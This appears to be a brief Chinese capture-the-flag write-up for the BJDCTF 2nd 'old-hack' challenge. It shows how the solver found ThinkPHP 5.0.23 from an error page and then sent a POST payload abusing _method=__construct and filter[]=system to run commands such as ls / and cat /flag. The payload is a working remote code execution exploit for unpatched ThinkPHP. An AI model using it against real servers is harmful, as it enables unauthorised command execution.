[BJDCTF 2nd]old-hack_thinkphp5漏洞

进入页面提示是thinkphp,先构造一个报错
[BJDCTF 2nd]old-hack_thinkphp漏洞
然后看到版本为THINK_VERSION5.0.23
然后百度查询漏洞:
payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
POST提交尝试一下,发现可行,然后就cat /flag
[BJDCTF 2nd]old-hack_thinkphp漏洞

相关文章:

  • 2021-06-21
  • 2021-11-13
  • 2021-09-10
  • 2021-04-08
  • 2021-06-04
  • 2021-08-17
  • 2021-12-18
  • 2021-08-06
猜你喜欢
  • 2022-01-21
  • 2022-12-23
  • 2021-06-06
  • 2021-11-27
  • 2021-08-29
相关资源
相似解决方案